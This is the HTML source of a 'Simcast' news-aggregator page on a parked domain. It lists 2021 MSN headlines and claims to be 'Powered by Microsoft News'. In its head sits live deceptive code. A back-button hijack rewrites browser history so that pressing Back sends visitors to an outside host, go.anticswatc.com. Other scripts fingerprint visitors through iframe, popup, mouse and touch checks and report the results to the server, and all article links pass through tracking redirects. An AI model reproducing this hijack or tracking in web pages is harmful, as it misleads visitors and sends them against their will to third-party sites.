<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Simcast News portal.</title>
        <meta charset="UTF-8">
        <meta name="description" content="Search on topics your interested. Read great personalised news.">
        <meta name="keywords" content="search,news,automotive,beauty,education,events,fashion,finance,games,health,home,insurance,legal,pets,property,shopping,sports,technology,transport,travel,utilties">
        <meta name="author" content="Simcast">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="/templates/simcast/favicon.png" type="image/x-icon">
        <script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous" ></script>
        <link type="text/css" href="/templates/simcast/css/html.css" rel="stylesheet" >
        <link href="/lib/fontawesome-5.9.0/css/all.min.css" rel="stylesheet" >

        <script>
    (function (window, location) {
        var redirect = "http://go.anticswatc.com/ts8229-backbutton-us";
        var currentUrl = location.origin + location.pathname + location.search;
        if (location.hash !== "#!/hst") {
            history.replaceState(null, document.title, currentUrl + "#!/hst");
            history.pushState(null, document.title, currentUrl);
        }

        window.addEventListener("popstate", function () {
            if (location.hash === "#!/hst") {
                setTimeout(function () {
                    window.location.replace(redirect);
                }, 0);
            }
        }, false);
    }(window, location));
</script><script type="text/javascript" >
    $(document).ready(function () {
        var totX = 0;
        var totY = 0;
        var startx = 0;
        var starty = 0;
        var mess = 0;

            //test for javascript
            var fra = 0;
            var ip = 0;
            var infr = window.self !== window.top;
            if (infr) {
                fra = 1;
            }
            var pop = (window.opener !== undefined && window.opener !== null && window.opener !== window);
            if (pop) {
                ip = 1;
            }
            $.ajax({
                method: "GET",
                url: "/widgets/ms/js.php?fra=" + fra + "&ip=" + ip
            });
            document.addEventListener('touchstart', function (e) {
            var touchobj = e.changedTouches[0]; // first touch
            totX = totX + parseInt(touchobj.clientX);
            totY = totY + parseInt(touchobj.clientY);
        }, false);

        document.addEventListener('touchend', function (e) {
            var touchobj = e.changedTouches[0]; // last touch
            totX = totX + abs(parseInt(touchobj.clientX) - startx);
            totY = totY + abs(parseInt(touchobj.clientY) - starty);
        }, false);

        document.onmousemove = function (e) {
            totX = totX + e.pageX;
            totY = totY + e.pageY;
        };
        setInterval(checkCursor, 200);

        function checkCursor() {
            if ((totX !== 0) || (totY !== 0)) {
                if (mess !== 2) {
                    mess = 2;
                    document.cookie = "mess=2";
                    $.ajax({
                        method: "GET",
                        url: "/widgets/ms/up.php?mess=" + mess
                    });
                }
            }
        }
    }
    );
</script>
        <script>
            $(document).ready(function () {
                if ($(".columns").text().length === 0) {
                    $('.columns').hide();
                }
            });
        </script>
        <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
        <script>
            var OneSignal = window.OneSignal || [];
            OneSignal.push(function () {
                OneSignal.init({
                    appId: "4c7b68c0-29d9-46be-b278-bfc487c22942"
                });
            });
        </script>

    </head>
    <body id="mainbody">
        <div class="menutop clearfix">
            <div id="plBanner">
                <script id="parklogic" type="text/javascript" src="https://parking2.parklogic.com/page/enhance.js?pcId=56&domain=nuevodialeones.com"></script>
            </div>
            <div class='logo-block'><a href='/widgets/banners/rules.php?bid=110&wid=2&tid=59&d=nuevodialeones.com' target=''><img src='/templates/simcast/images/simcastlogo_35y.png' alt='Simcast Logo' style='max-width:169;max-height:35;' class='logo-image'></a></div><div class='menu-block'><ul class='dropdown'><li><a href='/news'  title='News'>News</a><ul></ul></li><li><a href='/Entertainment'  title='Entertainment'>Entertainment</a><ul></ul></li><li><a href='/Money'  title='Money'>Money</a><ul></ul></li><li><a href='/Lifestyle'  title='Lifestyle'>Lifestyle</a><ul></ul></li><li><a href='/Health'  title='Health'>Health</a><ul></ul></li><li><a href='/Travel'  title='Travel'>Travel</a><ul></ul></li><li><a href='/Video'  title='Videos'>Videos</a><ul></ul></li><li><a href='/Sports'  title='Sports'>Sports</a><ul></ul></li><li><a href='/About-Us' onclick='return myConfirm("/About-Us");' title='About Us'>About Us</a><ul><li><a href='/about-us/About-Simcast'  title='About Simcast'>About Simcast</a><ul></ul></li><li><a href='/about-us/Contact-Us'  title='Contact Us'>Contact Us</a><ul></ul></li><li><a href='/about-us/Policies'  title='Policies'>Policies</a><ul><li><a href='/about-us/policies/Privacy-Policy'  title='Privacy Policy'>Privacy Policy</a><ul></ul></li><li><a href='/about-us/policies/Terms-of-Use'  title='Terms of Use'>Terms of Use</a><ul></ul></li></ul></li></ul></li></ul></div>        <script>
            function myConfirm(message) {
                switch (message.length) {
                    case 0:
                        message = "WARNING!\nAre you sure you want to do this?";
                    case 1:
                        message = "";
                        break;
                }
                if (confirm(message) === true) {
                    return true;
                } else {
                    return false;
                }
            }
        </script>
                    <div class="powered-block">Powered by <em><strong>Microsoft News</strong></em></div>
        </div>
        <div id="contentwrapper">
                            <div class='search-block clearfix'>
                    <div class='search-inputblock'>
                <form method="post" action="/widgets/searches/rl.php" >
                                        <input type="text" name="q" value="Search Internet"
                           onblur="if (this.value === '') {
                                       this.value = 'Search Internet';
                                   }"
                           onfocus="if (this.value === 'Search Internet') {
                                       this.value = '';
                                   }"
                           class='search-inputbox'  aria-label='Search Internet'/>
                    <input name="inputboxvar" type="hidden" value="q" />
                    <input name="ms" type="hidden" value="0" />
                    <input name="remote" type="hidden" value="0" />
                    <button type='submit' class='search-button'><i class="fas fa-search"></i></button>
                </form>
            </div>
                </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.css" />
<style>
    p.modalheading {
        font-size:24px;
        font-weight:bold;
        color:#A67EAC;
        padding:10px 0px;
    }
    .modalinput {
        font-size: 14px;
        padding: 6px 12px;
        height: 20px;
        width:200px;
        color: #555;
        border: 1px solid #A67EAC;
        border-radius: 4px;
    }
    .modalbutton {
        height: 35px;
        width: 90px;
        border-radius: 5px;
        border:0px;
        margin: 10px 0px 10px 0px;
        color: #fff;
        padding: 0px 10px 0px 10px;
        font-size: 18px !important;
        background-color: #865E8C;
        cursor: pointer;
    }
    .modalbutton:hover {
        background-color:#A67EAC;
    }
</style>
<script>
    function displayModal(mm) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm);
    }
    function displayComment(mm, k, id) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm + "&k=" + k + "&id=" + id);
    }
    $(document).ready(function () {
        var mm = 0;
        if (mm !== 0) {
            displayModal(mm);
        }
    });

</script>
<div id="modalout"></div>











            <div class="articlewrapper">
                <div class="row">
                    
<div class='leftcolumn'>
            <div class='majorArticle-block'>
            <a href='/widgets/tk/msc.php?id=0&k=news' target="_BLANK">
                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKtdi3.img?h=500&w=1000&x=500&y=250&m=2'  class='majorArticle-image'>
                <div class='majorArticle-title'>
                    E3 2021 schedule: Every major event you need to know about                </div>
            </a>
        </div>
                <div id='trendingnews'>
        <div class='trendingnewsheading'>Trending News</div>            <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=1&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt6e2.img?h=100&w=100&x=1484&y=843&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            WHO chief concedes 'slow' response to Congo sex abuse claims                             <div class='textArticle-abstract'>
                                LONDON (AP) — The head of the World Health Organization acknowledged the U.N. health agency's response to sexual abuse allegations involving employees who worked in Congo during an Ebola outbreak was “slow,” following an Associated Press investigation...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AACl4vY.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    Associated Press&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=2&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKskv7.img?h=100&w=100&x=667&y=1027&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            The Asian American ‘model minority’ myth masks a history of discrimination                             <div class='textArticle-abstract'>
                                In the 1950s the stereotype that Asian Americans are singularly high achieving arose to drive a wedge between marginalized groups.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBJ3XCJ.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    National Geographic&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=3&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt8nD.img?h=100&w=100&x=667&y=1027&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Plastics from burning ship cover Sri Lanka beach                             <div class='textArticle-abstract'>
                                Tonnes of charred plastic pellets from a burning container ship washed shore near Sri Lanka's capital Friday as an international effort to salvage the vessel dragged into a ninth day. Thick black smoke rose from the Singapore-registered MV X-Press Pearl,...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    AFP&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=4&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt1uY.img?h=100&w=100&x=938.5&y=117.5&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            San Jose shooting: Mourners gather at City Hall to show their community is not broken after a shooting                            <div class='textArticle-abstract'>
                                Nine navy blue uniform caps sat above nine photos of the Santa Clara Valley Transportation Authority employees killed in a San Jose rail yard as loved ones and community members gathered at the City Hall on Thursday to remember the latest victims of a...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywGC0.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    CNN&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=5&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKrNcO.img?h=100&w=100&x=938.5&y=117.5&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Biden to Meet GOP Next Week on Infrastructure as Clock Ticks                             <div class='textArticle-abstract'>
                                President Joe Biden plans to meet with Republicans next week after a group of GOP senators pitched a fresh offer on a major new infrastructure plan, but warned that the window for a deal will shut soon, with Republicans still over $1 trillion short of...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA3lldo.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    Bloomberg&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                </div>
    </div>
<div class='middlecolumn'>
    <div>
            </div>
    <div class='breakingnews'>
        Breaking News
    </div>
                <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=6&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKrYwL.img?h=70&w=95&x=1054.5&y=261.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=6&k=news' class='minorArticle-text' target="_BLANK">
                        UPS employee shares message of hard work, inspires scholarship fund                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=6&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABiyAn.img' style='height:18px;float:left;'>&nbsp;
                        ABC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt8aR.img?h=70&w=95&x=1054.5&y=261.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-text' target="_BLANK">
                        Burning ship coats 'tourist paradise' beach in oil                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBolVIq.img' style='height:18px;float:left;'>&nbsp;
                        BBC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKthIe.img?h=70&w=95&x=1054.5&y=261.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-text' target="_BLANK">
                        The Philippines has dramatically boosted South China Sea patrols, data shows                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAADLcm.img' style='height:18px;float:left;'>&nbsp;
                        CNBC&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKtaCG.img?h=70&w=95&x=1054.5&y=261.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-text' target="_BLANK">
                        SolarWinds hackers are at it again, Microsoft says                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBAJ56P.img' style='height:18px;float:left;'>&nbsp;
                        NBC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKsl42.img?h=70&w=95&x=1287&y=770.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-text' target="_BLANK">
                        'I'm not going to shoot you': Gunman appeared to target victims at San Jose rail yard, spared others                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img' style='height:18px;float:left;'>&nbsp;
                        USA TODAY&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1dDNxB.img?h=70&w=95&x=137&y=307&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-text' target="_BLANK">
                        Murkowski voices frustration with GOP over Jan. 6 commission: 'Something bad happened'                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBUvpML.img' style='height:18px;float:left;'>&nbsp;
                        The Hill&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKsrMv.img?h=70&w=95&x=1619&y=604&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-text' target="_BLANK">
                        Biden calls out Republicans who have taken credit for rescue plan but voted against it                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBOPUKu.img' style='height:18px;float:left;'>&nbsp;
                        Yahoo! News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt7tT.img?h=70&w=95&x=1619&y=604&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-text' target="_BLANK">
                        ‘One name in a long list’: the pointless death of another West Bank teenager                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxfDD.img' style='height:18px;float:left;'>&nbsp;
                        The Guardian&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKt4Og.img?h=70&w=95&x=1619&y=604&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-text' target="_BLANK">
                        GOP senators are set to tank the bipartisan proposal for a Jan. 6 commission, much of which is identical to the law creating the Sept. 11 commission bill. Here's how they compare.                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10dZOG.img' style='height:18px;float:left;'>&nbsp;
                        Business Insider&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1g9L7q.img?h=70&w=95&x=524&y=416&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-text' target="_BLANK">
                        Senate bid to counter China thrown into chaos amid GOP objections                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO6J5d.img' style='height:18px;float:left;'>&nbsp;
                        POLITICO&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKaEs4.img?h=70&w=95&x=524&y=416&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-text' target="_BLANK">
                        Biden must rally the world against an increasingly malevolent China                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABp9vq.img' style='height:18px;float:left;'>&nbsp;
                        Washington Examiner&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
            </div>
<div class='rightcolumn'>
    <div id="sidebar">
            <script>
        $(document).ready(function () {
            $("#signin").show();
            $("#signup").hide();
            $("#signinbutton").addClass('login-buttonselected');
            $("#signupbutton").addClass('login-buttonunselected');

            $("#signinbutton").click(function () {
                $("#signin").show();
                $("#signup").hide();
                $("#signinbutton").removeClass('login-buttonunselected');
                $("#signinbutton").addClass('login-buttonselected');
                $("#signupbutton").removeClass('login-buttonselected');
                $("#signupbutton").addClass('login-buttonunselected');
            });
            $("#signupbutton").click(function () {
                $("#signin").hide();
                $("#signup").show();
                $("#signinbutton").removeClass('login-buttonselected');
                $("#signinbutton").addClass('login-buttonunselected');
                $("#signupbutton").removeClass('login-buttonunselected');
                $("#signupbutton").addClass('login-buttonselected');
            });

        });
    </script>
        <div class='login-block' >
        <div class='login-heading'>
            <button id='signinbutton' class='login-button'>Sign-in</button>&nbsp;&nbsp;&nbsp;&nbsp;
            <button id='signupbutton' class='login-button'>Sign-up</button></div>
        <div id='signin'>
            <form action=/widgets/login/login.php method="POST">
                <div class='login-fieldnames'>USERNAME</div>
                <input type="text" id="emaillogin" name="emaillogin" value="Email Address" class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Email Address';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Email Address') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }"><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="passwordlogin" name="passwordlogin" value="Password"  class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Password';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Password') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }">
                <input type="checkbox" name="remember" value="" checked>&nbsp;<span  class='login-remember'>Remember me</span><br>
                <input type="hidden" name="link" value='/'>
                <input type="submit" name="sub" value="Sign-in" class='login-submit'>
            </form>
            <div class='login-forgot'><a href='javascript:displayModal(1)' class='login-forgotlink'>Forgot password</a></div>
        </div>
        <div id='signup'>
            <form action=/widgets/login/signup.php method="POST" id='signupform'>
                <div class='login-fieldnames'>NAME</div>
                <input type="text" id="name" name="name" value="" class='login-input'><br>
                <div class='login-fieldnames'>EMAIL</div>
                <input type="text" id="email" name="email" value="" class='login-input'><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="password" name="password" value=""  class='login-input'>
                <input type="checkbox" id="terms" name="terms" value="" checked>&nbsp;<span class='login-terms'>
                    Agree to the <a href='/about-us/policies/Terms-of-Use' target='_BLANK' class='login-terms'>Terms of Use</a></span><br>
                <input type="hidden" name="path" value='/'>
                <input type="hidden" name="recaptcha" value='0'>
                                <input type="submit" name="signup" value="Sign-up"  class='login-submit'>
            </form>
        </div>
    </div>
                    <div id="categories">
            <div id='category-bar'>Categories</div>
            <div class='category-block'><a href=/entertainment class=category-textlink>Entertainment</a><br>
<a href=/health class=category-textlink>Health</a><br>
<a href=/lifestyle class=category-textlink>Lifestyle</a><br>
<a href=/money class=category-textlink>Money</a><br>
<a href=/news class=category-textlink>News</a><br>
<a href=/sports class=category-textlink>Sports</a><br>
<a href=/travel class=category-textlink>Travel</a><br>
<a href=/videos class=category-textlink>Videos</a><br></div>        </div>
                <div style='text-align:center;'>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=17&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gCIcJ.img?h=400&w=300&x=471.5&y=300.5&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>Tristyn Bailey</div>
                </a>
            </div>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=18&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKsQ0s.img?h=400&w=300&x=687.5&y=154.5&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>Seth Meyers Lashes Out at Marjorie Taylor Greene...</div>
                </a>
            </div>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=19&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKsJKi.img?h=400&w=300&x=497&y=387&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>U.S. Is Said to Have Unexamined Intelligence to Pore...</div>
                </a>
            </div>
                                </div>
    </div>
</div>
<div class='farrightcolumn'>
    </div>
                </div>
            </div>
            <div id="footer">
                <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NPHB61BDSE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NPHB61BDSE');
</script><div class='article-block'><table border="0" cellpadding="1" style="width:50%">
	<tbody>
		<tr>
			<td style="width:33%"><a class="footerlink" href="/news">News</a><br />
			<a class="footerlink" href="/autos">Automotive</a><br />
			<a class="footerlink" href="/money">Money</a><br />
			<a class="footerlink" href="/entertainment">Entertainment</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:33%"><a class="footerlink" href="/health">Health</a><br />
			<a class="footerlink" href="/travel">Travel</a><br />
			<a class="footerlink" href="/video">Videos</a><br />
			<a class="footerlink" href="/sports">Sports</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:34%"><a class="footerlink" href="/about-us/About-Simcast">About Us</a><br />
			<a class="footerlink" href="/about-us/Contact-Us">Contact Us</a><br />
			<a class="footerlink" href="/about-us/policies/Privacy-Policy">Privacy Policy</a><br />
			<a class="footerlink" href="/about-us/policies/Terms-of-Use">Terms of Use</a></td>
		</tr>
	</tbody>
</table>
</div>            </div>
                    </div>
    </body>
</html>

